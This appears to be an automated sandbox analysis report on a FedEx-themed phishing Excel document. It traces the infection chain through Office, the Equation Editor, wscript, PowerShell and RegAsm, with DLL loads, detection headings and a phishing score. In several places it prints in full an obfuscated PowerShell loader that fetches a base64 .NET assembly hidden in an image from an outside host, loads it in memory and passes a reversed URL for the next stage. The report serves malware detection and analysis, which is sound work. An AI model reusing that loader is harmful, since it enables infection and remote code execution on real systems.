Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: RunPE.pdb source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.473348912.0000000000280000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp

Source: ~DFE1D622D06AD63FEF.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: FedEx Receipt_53065724643.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

.NET source code contains potential unpacker

Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, RunPEE.cs	.Net Code: Run4 System.Reflection.Assembly.Load(byte[])

Obfuscated command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_002A21D8 push ebx; iretd	10_2_002A21EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00414023 push esp; iretd	12_2_0041403D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004021C2 push ebp; ret	12_2_004021CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402209 push ebp; ret	12_2_004021CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00411B15 push ss; retf	12_2_00411B46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00403400 push eax; ret	12_2_00403402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041A408 pushfd ; ret	12_2_0041A409
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00404D15 pushfd ; iretd	12_2_00404D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00408605 push ss; retf	12_2_0040861C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040773F push edx; iretd	12_2_0040774B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239DFA1 push ecx; ret	12_2_0239DFB4

Source: 10.2.powershell.exe.280000.0.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.280000.0.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.6254d98.2.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, Home.cs	High entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, RunPEE.cs	High entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
Source: 10.2.powershell.exe.6672f94.1.raw.unpack, Class2.cs	High entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'

Persistence and Installation Behavior

Microsoft Office launches external ms-search protocol handler (WebDAV)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\ilang.in\DavWWWRoot			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File opened: \Device\RdpDr\;:1\ilang.in\DavWWWRoot			Jump to behavior

AI detected suspicious Excel or Word document

Source: Office document

LLM: Score: 9 Reasons: The document prominently displays the logo of a well-known brand (Office) which could be used to impersonate the brand and gain the user's trust. The text creates a sense of urgency and interest by instructing the user to 'Open the document in Microsoft Office' and to 'Enable Editing' and 'Enable Content' from the yellow bar above. These instructions are commonly used in phishing attacks to trick users into enabling macros, which can then execute malicious code. The combination of brand impersonation, urgency, and specific instructions to enable potentially harmful features significantly increases the risk of phishing or malware.

Office drops RTF file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File dump: ima.imim.im.imim[1].doc.0.dr			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File dump: DD4612E1.doc.4.dr			Jump to dropped file

Office viewer loads remote template

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Section loaded: netapi32.dll and davhlpr.dll loaded

Jump to behavior

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,

7_2_036407AB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
